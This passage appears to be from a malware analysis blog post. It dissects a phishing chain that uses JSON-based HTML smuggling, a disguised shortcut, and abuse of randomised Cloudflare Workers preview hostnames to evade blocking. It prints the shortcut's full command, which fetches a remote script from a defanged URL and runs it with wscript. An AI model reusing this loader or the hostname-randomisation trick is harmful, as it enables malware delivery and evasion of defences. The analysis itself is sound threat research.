To generate the second stage of the attack, the JSON from the URL is parsed, converted from Base64 to Array buffer, written to browser’s blob storage, renamed to match to the name of the HTML file, a link is created and auto clicked to download it to user’s browser.

What the download looks like in Chrome.

Second stage:

The second stage starts with a zip file which was just created based on the data from the URL. This method of file creation has few advantages versus just statically downloading a zip file.

1. Threat actor can create different files for different target and serving it via one endpoint.

2. The network traffic might block downloading file objects, but JSON is a natural part of the web and would never be blocked.

3. Some security solution vendors can identify file object on traffic of the network and send that for analysis. This would jeopardize the operation fairly fast and IOCs can be distributed across the world in no time.

The zipped file contains a shortcut with a modified target and Icon.

Totally legitimate-looking shortcut!

%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/")" > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js”

Let’s dissect.

While it’s less commonly known or used but “%ComSpec%” is a pre-assigned environment variable that, by default, stores the “cmd.exe” absolute path and dates back to the stone ages.

Next, we have the GetObject VBA function with a link to WScript file to download and run from the temp folder. But pay attention to the URL again, there is %RANDOM% command in the URL. %RANDOM% is a built-in variable in Windows CMD shell that generates a random integer from 0 to 32,767. Since the URL has echo wrapped around it, the random variable is successfully replaced with valid numbers and passed to CMD to execute the GetObject command. This leads to generating an almost unlimited number of URLs based on that random variable returns. To understand how this is working, we need to understand how Cloudflare Workers work.

By everyone, they mean threat actors as well.

Cloudflare Workers derive their name from Web Workers, and more specifically Service Workers, the W3C standard API for scripts that run in the background in a web browser and intercept HTTP requests. Cloudflare Workers are written against the same standard API but run on Cloudflare’s servers, not in a browser. Cloudflare Workers lets you run JavaScript in Cloudflare’s hundreds of data centers around the world. Using a Worker, one can do a number of things, including:

Load balance between multiple origins to improve speed or reliability.

Render HTML templates while fetching dynamic content from your origin.

Dynamically respond to requests without needing to connect to an origin server at all.

Generate parallel requests to different services and combine the responses.

Create custom security rules and filters to block unwanted visitors and bots.

Perform data sanitation and validation before sending a request to origin.

Actions happen inside Cloudflare’s lightning-fast edge network.

All and all, Cloudflare Workers’ introduces a great resilient platform to the threat actors without the need for them to maintain infrastructure. Cloudflare.

Workers has a free plan which anyone or anything can sign up and get 100,000 total requests per day. You can create unlimited number of workers per account.

But you might still be asking how did that the URL with a random number as subdomain was created?

Cloudflare Workers dashboard has script editor feature which gives the developers option to write and preview script before deploying to their network. It’s something of a jsfiddle.net if you wish. The preview fiddle renders the script on a different hostname every time the script is run, except it’s not one. It’s a virtual one created based on the incoming request and the Workers name given to it.

Let me show you an example:

Here I have a free worker which is running a simple script to just return “Hello World” as the page content. There is a preview panel on the side that display the changes I make when I press run.

Workers Script Editor

This is the general flow that Cloudflare Script editor uses to preview the changes:

The preview panel is not run from the Workers ID address. if you open up Chrome’s network panel, you would see the response is coming from a different hostname every time.

First run.

The first run involves making a GET request to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

which after settings a cookie, redirects to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com

Second run.

Like the first run, the second run is making a GET request to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

with redirects to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com

Now if I make an arbitrary change in the Workers name in the first GET request URL, the response would still be the same. Here I replaced the first 5 digits with 12345 and the redirected shows the same content.

voila!

Potentially this can produce a large or unlimited number of the hostname that can execute particular code which traditional Anti-bot or blocking tools will fail to catch. Cloudflare Workers do not have the capability to host file but it can redirect traffic from its Workers to a static file hosting server without revealing its identity. Cloudflare documentations even provide an example:

Remember the shortcut? you can replace the RANDOM with any digits or letters you end up with a preview URL which drops script file.

hxxps://xsw12345nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev

Third Stage:

The script file is saved into temp\ Lqncxmm:vbvvjjh.js and executed with Windows Script Host (Wscript) process. You can see how the threat actor uses the feature of Cloudflare to their advantage. The authors have added a simple random number generator and essentially randomize the URL that will download third stage payload.

such a simple function

The simple function above will generate a random number based on the parameter given to it. For the third stage, there are ten randomized and unique Cloudflare Worker node links they use a random number between 20000 to 50000, twice for each link. So just one link would have 900 million variations. I’ll let you do the calculation on how many traditional IOCs you would obtain from just a simple script.